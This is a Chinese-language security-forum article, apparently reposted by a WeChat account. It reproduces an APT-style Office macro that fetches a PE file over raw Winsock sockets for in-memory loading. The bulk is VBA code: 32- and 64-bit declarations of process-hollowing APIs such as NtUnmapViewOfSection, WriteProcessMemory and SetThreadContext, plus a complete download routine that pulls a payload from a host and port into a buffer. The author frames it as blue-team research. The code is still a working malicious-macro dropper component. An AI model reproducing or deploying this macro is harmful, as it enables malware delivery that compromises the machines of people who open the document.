查看原文
其他

一个远程下载并内存加载PE的office宏病毒

某警官 看雪学苑 2022-07-01

本文为看雪论坛优秀文章

看雪论坛作者ID:某警官



一  引言


这份代码写于2019年初,当时一个名为海莲花的apt组织使用office宏加载shellcode,用shellcode内存加载病毒,并使用白加黑的方式加载恶意dll,在看着分析报告完整的复现了他的攻击手法后,我想再多做一些尝试。

他的代码中shellcode与PE文件都是从本地解密得到的,我在此基础上增加了网络下载PE文件到内存,直接用office宏内存加载PE,并兼容了32位和64位系统。
    
本文讲解下载部分的函数与结构体定义。项目旨在研究office恶意宏的更多可行性,以便蓝队更好的做防御,切勿用于非法用途。



二  需求分析与初步设计


2.1 网络下载
使用宏调用ws2_32.dll的导出函数

2.2 内存加载
使用宏调用kernel32.dll的导出函数
  
2.3 兼容32位与64位
需要对所有函数与结构体做两份声明与定义



三  部分实现


首先需要对所需的函数进行声明,对结构体进行定义,我在这里花费了很长时间,对所有函数的声明如下,其中包含了32位与64位:

#If Win64 Then Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" () Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long) Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)#Else Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long Public Declare Sub WSACleanup Lib "ws2_32.dll" () Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long) Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)#End If


有了以上定义的函数,还需要定义一些结构体,其中包括socket通信需要用到的结构体与PE文件结构需要用到的结构体

socket通信结构体:

#If Win64 Then Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As LongLong End Type Private Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As LongLong 'strptr ai_addr As LongLong 'p sockaddr ai_next As LongLong 'p addrinfo End Type#Else Private Type WSADATA wVersion As Integer wHighVersion As Integer szDescription(0 To WSADESCRIPTION_LEN) As Byte szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte iMaxSockets As Integer iMaxUdpDg As Integer lpVendorInfo As Long End Type Private Type ADDRINFO ai_flags As Long ai_family As Long ai_socktype As Long ai_protocol As Long ai_addrlen As Long ai_canonName As Long 'strptr ai_addr As Long 'p sockaddr ai_next As Long 'p addrinfo End Type#End If


一些需要用到的枚举量:

Enum AF AF_UNSPEC = 0 AF_INET = 2 AF_IPX = 6 AF_APPLETALK = 16 AF_NETBIOS = 17 AF_INET6 = 23 AF_IRDA = 26 AF_BTH = 32End Enum Enum sock_type SOCK_STREAM = 1 SOCK_DGRAM = 2 SOCK_RAW = 3 SOCK_RDM = 4 SOCK_SEQPACKET = 5End Enum


PE文件结构体太多了就不写了,按照上面的那种格式与类型写就可以。

 

下载函数如下:

Function GetCode() Dim m_wsaData As WSADATA Dim m_RetVal As Integer Dim m_Hints As ADDRINFO Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET Dim Server As String Dim port As String #If Win64 Then Dim pAddrInfo As LongLong #Else Dim pAddrInfo As Long #End If Dim RetVal As Long Dim lastError As Long RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData) If (RetVal <> 0) Then LogError "WSAStartup failed with error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_family = AF.AF_UNSPEC m_Hints.ai_socktype = sock_type.SOCK_STREAM Server = "127.0.0.1" port = "9593" RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo) If (RetVal <> 0) Then LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError() Call WSACleanup Exit Function End If m_Hints.ai_next = pAddrInfo Dim connected As Boolean: connected = False Do While m_Hints.ai_next > 0 'Do While 1 CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints) m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol) If (m_ConnSocket = INVALID_SOCKET) Then LogError "Error opening socket, error " & RetVal Else Dim connectionResult As Long connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen) If connectionResult <> SOCKET_ERROR Then connected = True Exit Do End If LogError "connect() to socket failed" closesocket (m_ConnSocket) End If Loop If Not connected Then LogError "Fatal error: unable to connect to the server", WSAGetLastError() Call WSACleanup Exit Function End If 'Dim SendBuf() As Byte 'SendBuf = StrConv("Message #1", vbNarrow) '发送 Dim dataBuf As Variant dataBuf = Array(32, 42, 42, 5, 6) Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1 Dim sendBuf() As Byte ReDim sendBuf(dataLen) '打印发送的数据 Dim i As Long For i = 0 To dataLen - 1 sendBuf(i) = dataBuf(i) Debug.Print sendBuf(i); Next i RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0) If RetVal = SOCKET_ERROR Then LogError "send() failed", WSAGetLastError() Call WSACleanup Exit Function Else Debug.Print "sent " & RetVal & " bytes" End If '接收 Dim payloadBuf() As Byte Dim recvBuf() As Byte Dim recvSize As Integer: recvSize = 32 ReDim recvBuf(recvSize) Dim recvLen As Integer: recvLen = 0 Dim index As Long: index = 0 Do While 1 recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0) 'For i = 0 To recvLen - 1 ' Debug.Print recvBuf(i); 'Next i 'Debug.Print If recvLen > 0 Then ReDim Preserve payloadBuf(index + recvLen) Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen) index = index + recvLen Else Exit Do End If Loop '打印接收到的数据 Debug.Print "接收到的长度为:"; Debug.Print UBound(payloadBuf) - LBound(payloadBuf) 'Debug.Print "接收到的数据为:"; 'For i = 0 To index - 1 ' Debug.Print payloadBuf(i); '打印的时候加<;>则不换行 'Next i 'Debug.Print RetVal = closesocket(m_ConnSocket) If RetVal <> 0 Then LogError "closesocket() failed", WSAGetLastError() Call WSACleanup Else Debug.Print "closed socket" End If GetCode = payloadBufEnd Function


以上便是下载部分的大概思路与代码,内存加载部分感兴趣可以自己实现一下,难度主要在结构体的定义部分。



四  结语


office宏编程逻辑上与Windows编程相同,难点在于结构体的定义与API的声明,尤其是PE文件的结构体,按照上面的示例,花点时间就可以实现内存加载,难度不大,就是麻烦。



- End -




看雪ID:某警官

https://bbs.pediy.com/user-home-856450.htm

  *本文由看雪论坛 某警官 原创,转载请注明来自看雪社区。



《安卓高级研修班》2021年6月班火热招生中!


# 往期推荐





公众号ID:ikanxue
官方微博:看雪安全
商务合作:wsc@kanxue.com



球分享

球点赞

球在看



点击“阅读原文”,了解更多!

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存